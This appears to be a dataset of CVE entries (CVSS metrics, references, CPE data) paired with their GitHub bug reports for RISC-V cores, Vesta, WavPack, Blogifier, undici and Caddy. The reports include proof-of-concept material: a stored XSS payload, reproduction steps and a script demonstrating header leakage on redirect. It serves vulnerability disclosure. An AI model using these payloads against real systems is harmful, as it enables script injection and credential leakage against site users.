Our co-simulation framework found that the exception type of address translation PMP violation is incorrect. In the following test case, we let a non-leaf (level 2) PTE out of the PMP range. Next, we will perform a store operation with a special virtual address, during translation processor will try to access the PTE that does not match any PMP. cva6 throws a load access fault, while spike throws a store access fault. ``` [cva6] Exception @ 119000, PC: 000000008000036c, Cause: Load Access Fault, [cva6] tval: 0000000080102008 [spike] core 0: 0x000000008000036c (0x00b52023) sw a1, 0(a0) [spike] core 0: exception trap_store_access_fault, epc 0x000000008000036c [spike] core 0: tval 0x0000000040201010 [spike] core 0: 0x0000000080000004 (0x34302f73) csrr t5, mtval [error] WDATA SIM 0000000040201010, DUT 0000000080102008 [error] check board clear 30 error ``` According to riscv-privileged specification: > If accessing pte violates a PMA or PMP check, raise an access-fault exception corresponding to the original access type. Hence, cva6 should throw a store access fault. [cva6-9.zip](https://github.com/openhwgroup/cva6/files/8862145/cva6-9.zip) > @ProjectDimlight helps reproduce the problem
[Bug Report] Incorrect exception type of PMP violation during address translation
https://api.github.com/repos/openhwgroup/cva6/issues/906/comments
5
2022-06-08T13:53:25Z
2022-06-09T13:17:37Z
https://github.com/openhwgroup/cva6/issues/906
1,264,790,945
906
3,857
CVE-2022-34641
2022-07-18T23:15:13.087
CVA6 commit d315ddd0f1be27c1b3f27eb0b8daf471a952299a and RISCV-Boom commit ad64c5419151e5e886daee7084d8399713b46b4b implements the incorrect exception type when a PMP violation occurs during address translation.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/906" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/openhwgroup/cva6/pull/908" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/riscv-boom/riscv-boom/issues/605" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/openhwgroup/cva6/issues/906" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/openhwgroup/cva6/pull/908" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/riscv-boom/riscv-boom/issues/605" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:boom-core:riscvc-boom:-:*:*:*:*:*:*:*", "matchCriteriaId": "1507C03F-AB2F-4B03-BC3F-29B9B3690AD6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:openhwgroup:cva6:-:*:*:*:*:*:*:*", "matchCriteriaId": "D73073CF-1196-4ABF-A8AE-3BE51A34519C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/riscv-boom/riscv-boom/issues/605
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "riscv-boom", "riscv-boom" ]
**Type of issue**: bug report **Impact**: unknown **Development Phase**: proposal **Other information** Our co-simulation framework found that the exception type of address translation PMP violation is incorrect. In the following test case, we let a non-leaf (level 2) PTE out of the PMP range. Next, we will perform a store operation with a special virtual address, during translation processor will try to access the PTE that does not match any PMP. boom throws a store page fault(0xf), while spike throws a store access fault(0x7). ``` [boom] 3 0x0000000080000364 (0x0105051b) x10 0x0000000040201010 [boom] 3 0x0000000080000368 (0x02a00593) x11 0x000000000000002a [spike] core 0: 0x0000000080000364 (0x0105051b) addiw a0, a0, 16 [spike] core 0: 0x0000000080000368 (0x02a00593) li a1, 42 [boom] 3 0x0000000080000004 (0x34302f73) x30 0x0000000040201010 [spike] core 0: 0x000000008000036c (0x00b52023) sw a1, 0(a0) [spike] core 0: exception trap_store_access_fault, epc 0x000000008000036c [spike] core 0: tval 0x0000000040201010 [spike] core 0: 0x0000000080000004 (0x34302f73) csrr t5, mtval [boom] 3 0x0000000080000008 (0x34202f73) x30 0x000000000000000f [spike] core 0: 0x0000000080000008 (0x34202f73) csrr t5, mcause [error] WDATA SIM 0000000000000007, DUT 000000000000000f [error] check board clear 30 error [CJ] 0 integer register Judge Failed ``` According to riscv-privileged specification: > If accessing pte violates a PMA or PMP check, raise an access-fault exception corresponding to the original access type. Hence, boom should throw a store access fault. **Please tell us about your environment:** - version: `ad64c54` [boom-1.zip](https://github.com/riscv-boom/riscv-boom/files/8862295/boom-1.zip) > @ProjectDimlight helps reproduce the problem cc to @jerryz123
[Bug Report] Incorrect exception type of PMP violation during address translation
https://api.github.com/repos/riscv-boom/riscv-boom/issues/605/comments
0
2022-06-08T14:10:39Z
2022-06-08T14:10:39Z
https://github.com/riscv-boom/riscv-boom/issues/605
1,264,818,299
605
3,858
CVE-2022-34643
2022-07-18T23:15:13.200
RISCV ISA Sim commit ac466a21df442c59962589ba296c702631e041b5 implements the incorrect exception priotrity when accessing memory.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/riscv-software-src/riscv-isa-sim/issues/971" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/riscv-software-src/riscv-isa-sim/issues/971" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:riscv:spike_risc-v_isa_simulator:-:*:*:*:*:*:*:*", "matchCriteriaId": "CBDDC845-73D1-4788-888D-1F71F54951EF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/riscv-software-src/riscv-isa-sim/issues/971
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "riscv-software-src", "riscv-isa-sim" ]
Let's take the load instruction as an example: https://github.com/riscv-software-src/riscv-isa-sim/blob/0f15aa09005a12521c27005515e088cbd1b81629/riscv/mmu.h#L99-L125 At line 101, load will first check if it is aligned, then at line 122 it will try to access the address in the load_slow_path function. https://github.com/riscv-software-src/riscv-isa-sim/blob/0f15aa09005a12521c27005515e088cbd1b81629/riscv/mmu.cc#L142-L162 In load_slow_path, it will first check if it is legal address at line 153, and the watch point will be checked at the end of the function. Briefly, the order of priority is as follows: trap_load_address_misaligned > trap_load_access_fault > trap_breakpoint However, in the specification, trap_breakpoint has a higher priority than the others: ![image](https://user-images.githubusercontent.com/39120057/162751894-ea695d88-f09a-4dd1-83c4-026cff1d4d2f.png) We also co-simulate with rocket to check this point, rocket threw a breakpoint exception, while spike threw an error misaligned exception. The test point is at 0x800001c0 where loading a misaligned illegal address 0x100004001: ``` 3 0x00800001bc (0x7a261073) core 0: 0x00000000800001bc (0x7a261073) csrw tdata2, a2 3 0x0080000004 (0x34302f73) x30 0x0000000100004001 core 0: 0x00000000800001c0 (0x00062603) lw a2, 0(a2) core 0: exception trap_load_address_misaligned, epc 0x00000000800001c0 core 0: tval 0x0000000100004001 core 0: 0x0000000080000004 (0x34302f73) csrr t5, mtval 3 0x0080000008 (0x34202f73) x30 0x0000000000000003 core 0: 0x0000000080000008 (0x34202f73) csrr t5, mcause [error] WDATA SIM 0000000000000004, DUT 0000000000000003 [error] check board clear 30 error [CJ] integer register Judge Failed ``` [spike-0.zip](https://github.com/riscv-software-src/riscv-isa-sim/files/8464609/spike-0.zip)
[Bug Report] Wrong exception priority during access memory
https://api.github.com/repos/riscv-software-src/riscv-isa-sim/issues/971/comments
6
2022-04-11T13:48:47Z
2022-12-05T12:43:41Z
https://github.com/riscv-software-src/riscv-isa-sim/issues/971
1,200,004,978
971
3,859
CVE-2022-34025
2022-07-19T19:15:10.750
Vesta v1.0.0-5 was discovered to contain a cross-site scripting (XSS) vulnerability via the post function at /web/api/v1/upload/UploadHandler.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/serghey-rodin/vesta/issues/2252" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/serghey-rodin/vesta/issues/2252" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vestacp:vesta_control_panel:1.0.0-5:*:*:*:*:*:*:*", "matchCriteriaId": "948D4423-7EA2-4FB2-90A7-B7E5D3BD3B1C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/serghey-rodin/vesta/issues/2252
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "serghey-rodin", "vesta" ]
Hello, I would like to report for possible XSS vulnerability. In file https://github.com/serghey-rodin/vesta/blob/master/web/api/v1/upload/UploadHandler.php the source in function post ```php public function post($print_response = true) { //.... // the source $_FILES[$this->options['param_name']] $upload = isset($_FILES[$this->options['param_name']]) ? $_FILES[$this->options['param_name']] : null; // .... foreach ($upload['tmp_name'] as $index => $value) { // $files will have the source which return from handle_file_upload $files[] = $this->handle_file_upload( $upload['tmp_name'][$index], $file_name ? $file_name : $upload['name'][$index], $size ? $size : $upload['size'][$index], $upload['type'][$index], // The source $upload['error'][$index], $index, $content_range ); } //..... // call generate_response and pass the source in the array in $files return $this->generate_response( array($this->options['param_name'] => $files), $print_response ); } ``` function handle_file_upload ```php protected function handle_file_upload($uploaded_file, $name, $size, $type, $error, //..... // the source in $file->type $file->type = $type; //.... return $file; } ``` function generate_response ```php protected function generate_response($content, $print_response = true) { if ($print_response) { $json = json_encode($content); //..... $this->body($json); } } ``` Finally, the sink in function body ```php protected function body($str) { // the sink echo $str; } ```
Possible XSS Vulnerability
https://api.github.com/repos/outroll/vesta/issues/2252/comments
6
2022-06-06T12:55:48Z
2022-07-27T10:49:06Z
https://github.com/outroll/vesta/issues/2252
1,261,807,957
2,252
3,860
CVE-2022-2476
2022-07-19T20:15:11.303
A null pointer dereference bug was found in wavpack-5.4.0 The results from the ASAN log: AddressSanitizer:DEADLYSIGNAL ===================================================================84257==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x561b47a970c6 bp 0x7fff13952fb0 sp 0x7fff1394fca0 T0) ==84257==The signal is caused by a WRITE memory access. ==84257==Hint: address points to the zero page. #0 0x561b47a970c5 in main cli/wvunpack.c:834 #1 0x7efc4f5c0082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) #2 0x561b47a945ed in _start (/usr/local/bin/wvunpack+0xa5ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV cli/wvunpack.c:834 in main ==84257==ABORTING
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dbry/WavPack/issues/121" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CK45CC7MQ54SHEIJ63PW3HP4BCPTX6QP/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QMIXZWB3OURGBAEU3T5HQY56BN2ZVLYF/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/dbry/WavPack/issues/121" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CK45CC7MQ54SHEIJ63PW3HP4BCPTX6QP/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QMIXZWB3OURGBAEU3T5HQY56BN2ZVLYF/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wavpack:wavpack:5.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "3FA5388B-91D0-45C6-BEC9-4953666966D7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/dbry/WavPack/issues/121
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "dbry", "WavPack" ]
Hi, I found a null pointer dereference at cli/wvunpack.c:911 Here's ASAN log: AddressSanitizer:DEADLYSIGNAL ================================================================= ==84257==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x561b47a970c6 bp 0x7fff13952fb0 sp 0x7fff1394fca0 T0) ==84257==The signal is caused by a WRITE memory access. ==84257==Hint: address points to the zero page. #0 0x561b47a970c5 in main cli/wvunpack.c:911 #1 0x7efc4f5c0082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) #2 0x561b47a945ed in _start (/usr/local/bin/wvunpack+0xa5ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV cli/wvunpack.c:911 in main ==84257==ABORTING Steps to Reproduce ./configure --disable-shared CFLAGS="-fsanitize=address -ggdb" CXXFLAGS="-fsanitize=address -ggdb" make & make install /usr/local/bin/wvunpack -m poc.wv -o / [poc.ZIP](https://github.com/dbry/WavPack/files/9044051/poc.ZIP)
Null pointer dereference at cli/wvunpack.c
https://api.github.com/repos/dbry/WavPack/issues/121/comments
1
2022-07-05T07:09:55Z
2024-03-16T03:44:06Z
https://github.com/dbry/WavPack/issues/121
1,293,883,996
121
3,861
CVE-2022-35569
2022-07-20T18:15:08.673
Blogifier v3.0 was discovered to contain an arbitrary file upload vulnerability at /api/storage/upload/PostImage. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/blogifierdotnet/Blogifier/issues/316" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/blogifierdotnet/Blogifier/issues/316" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:blogifier:blogifier:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "AA07869B-835C-41C0-B00C-B776C312BC7B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/blogifierdotnet/Blogifier/issues/316
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "blogifierdotnet", "Blogifier" ]
**Describe the bug** Stored XSS exists in Blogifier 3.0 via filename parameter in '/api/storage/upload/PostImage'. **Steps to reproduce** 1. Login as admin. 2. Click on 'New post'. 3. Click on 'Insert Image' and insert the following payload `<img src=1 onerror=alert(1)>` in filename field. 4. Click on Save, Publish and View the post. ![1](https://user-images.githubusercontent.com/35623498/177812370-004d0730-cbbc-43dd-bcdb-c23bcbd545fe.PNG) ![2](https://user-images.githubusercontent.com/35623498/177812655-49e34e9b-91b9-44b3-ae13-ee8596d2a52d.PNG) ![3](https://user-images.githubusercontent.com/35623498/177812753-8d164252-b7e3-448e-adfe-350fb8212b3a.PNG)
Stored XSS via filename parameter in '/api/storage/upload/PostImage'
https://api.github.com/repos/blogifierdotnet/Blogifier/issues/316/comments
1
2022-07-07T15:31:55Z
2022-07-10T02:34:36Z
https://github.com/blogifierdotnet/Blogifier/issues/316
1,297,647,655
316
3,862
CVE-2022-31151
2022-07-21T04:15:12.157
Authorization headers are cleared on cross-origin redirect. However, cookie headers which are sensitive headers and are official headers found in the spec, remain uncleared. There are active users using cookie headers in undici. This may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site. This was patched in v5.7.1. By default, this vulnerability is not exploitable. Do not enable redirections, i.e. `maxRedirections: 0` (the default).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 1.4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nodejs/undici/issues/872" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp" }, { "source": "security-advisories@github.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://hackerone.com/reports/1635514" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220909-0006/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nodejs/undici/issues/872" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://hackerone.com/reports/1635514" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220909-0006/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nodejs:undici:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "6CE17D7F-0014-4379-A243-34EA094A0E05", "versionEndExcluding": "5.7.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "346" ]
346
https://github.com/nodejs/undici/issues/872
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nodejs", "undici" ]
## Bug Description Security flaw. ## Reproducible By ```js const http = require('http'); const undici = require('undici'); const server = http.createServer((request, response) => { if (request.headers.authorization != 'test') { response.statusCode = 403; response.end(); return; } response.statusCode = 302; response.setHeader('location', 'https://httpbin.org/anything'); response.end(); }); server.listen(8080, async () => { const {statusCode, headers, body} = await undici.request('http://localhost:8080', { maxRedirections: 3, headers: { authorization: 'test' } }); const chunks = []; for await (const chunk of body) { chunks.push(chunk); } const parsed = JSON.parse(Buffer.concat(chunks)); console.log(parsed.headers.Authorization); undici.getGlobalDispatcher().destroy(); server.close(); }); ``` ## Expected Behavior The `authorization` header should be deleted when redirecting to third party origin. ## Environment ``` Linux solus 5.13.1-187.current #1 SMP PREEMPT Wed Jul 7 19:52:26 UTC 2021 x86_64 GNU/Linux Node v16.4.2 undici@4.1.0 ```
`authorization` header is not deleted on redirects to third party origins
https://api.github.com/repos/nodejs/undici/issues/872/comments
0
2021-07-11T17:25:59Z
2021-07-12T07:12:12Z
https://github.com/nodejs/undici/issues/872
941,498,406
872
3,863
CVE-2022-34037
2022-07-22T15:15:08.580
An out-of-bounds read in the rewrite function at /modules/caddyhttp/rewrite/rewrite.go in Caddy v2.5.1 allows attackers to cause a Denial of Service (DoS) via a crafted URI. Note: This has been disputed as a bug, not a security vulnerability, in the Caddy web server that emerged when an administrator's bad configuration containing a malformed request URI caused the server to return an empty reply instead of a valid HTTP response to the client.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/caddyserver/caddy/issues/4775" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/caddyserver/caddy/issues/4775#issuecomment-1203388116" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/caddyserver/caddy/issues/4775" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/caddyserver/caddy/issues/4775#issuecomment-1203388116" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:caddyserver:caddy:2.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "CADA4E73-FE23-4494-9BAF-66084596E46F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/caddyserver/caddy/issues/4775
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "caddyserver", "caddy" ]
It occurs in modules/caddyhttp/rewrite/rewrite.go. Specifically,this bug locates in `func (rewr Rewrite) rewrite` ```go func (rewr Rewrite) rewrite(r *http.Request, repl *caddy.Replacer, logger *zap.Logger) bool { oldMethod := r.Method oldURI := r.RequestURI // method if rewr.Method != "" { r.Method = strings.ToUpper(repl.ReplaceAll(rewr.Method, "")) } // uri (path, query string and... fragment, because why not) if uri := rewr.URI; uri != "" { // find the bounds of each part of the URI that exist pathStart, qsStart, fragStart := -1, -1, -1 pathEnd, qsEnd := -1, -1 for i, ch := range uri { switch { case ch == '?' && qsStart < 0: pathEnd, qsStart = i, i+1 case ch == '#' && fragStart < 0: qsEnd, fragStart = i, i+1 case pathStart < 0 && qsStart < 0 && fragStart < 0: pathStart = i } } if pathStart >= 0 && pathEnd < 0 { pathEnd = len(uri) } if qsStart >= 0 && qsEnd < 0 { qsEnd = len(uri) } // isolate the three main components of the URI var path, query, frag string if pathStart > -1 { path = uri[pathStart:pathEnd] } if qsStart > -1 { query = uri[qsStart:qsEnd] } if fragStart > -1 { frag = uri[fragStart:] } ... ``` In this function, it parse the `rewr.URI` and attemps to find the bounds of each part of the URI that exist. However, this implementation is too simple to handle unexpected scenarios. If '#' appears in front of the '?' in `rewr.URI`, it makes that `qsStart` is larger than `qsEnd`, which leads to a crash like _'panic: runtime error: slice bounds out of range'_ in slice accessing at `query = uri[qsStart:qsEnd]`
[panic]: slice OOB caused by illegal uri
https://api.github.com/repos/caddyserver/caddy/issues/4775/comments
8
2022-05-09T06:30:02Z
2022-08-03T05:25:39Z
https://github.com/caddyserver/caddy/issues/4775
1,229,239,444
4,775
3,864
CVE-2022-34037
2022-07-22T15:15:08.580
An out-of-bounds read in the rewrite function at /modules/caddyhttp/rewrite/rewrite.go in Caddy v2.5.1 allows attackers to cause a Denial of Service (DoS) via a crafted URI. Note: This has been disputed as a bug, not a security vulnerability, in the Caddy web server that emerged when an administrator's bad configuration containing a malformed request URI caused the server to return an empty reply instead of a valid HTTP response to the client.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/caddyserver/caddy/issues/4775" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/caddyserver/caddy/issues/4775#issuecomment-1203388116" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/caddyserver/caddy/issues/4775" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/caddyserver/caddy/issues/4775#issuecomment-1203388116" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:caddyserver:caddy:2.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "CADA4E73-FE23-4494-9BAF-66084596E46F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
